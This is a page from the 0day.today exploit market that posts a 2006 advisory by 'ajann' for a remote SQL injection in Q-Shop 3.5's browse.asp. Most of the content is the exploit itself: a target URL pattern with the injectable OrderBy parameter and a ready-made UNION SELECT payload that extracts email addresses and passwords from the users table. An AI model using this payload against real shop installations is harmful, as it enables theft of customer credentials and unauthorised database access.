[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Q-Shop 3.5 (browse.asp) Remote SQL Injection Vulnerability

Author
ajann
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-849
Category
web applications
Date add
16-09-2006
Platform
unsorted
==========================================================
Q-Shop 3.5 (browse.asp) Remote SQL Injection Vulnerability
==========================================================



Vulnerability Report
*******************************************************************************
# Title  :  Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://quadcomm.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]

Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

# ajann,Turkey
# ...



#  0day.today [2024-10-05]  #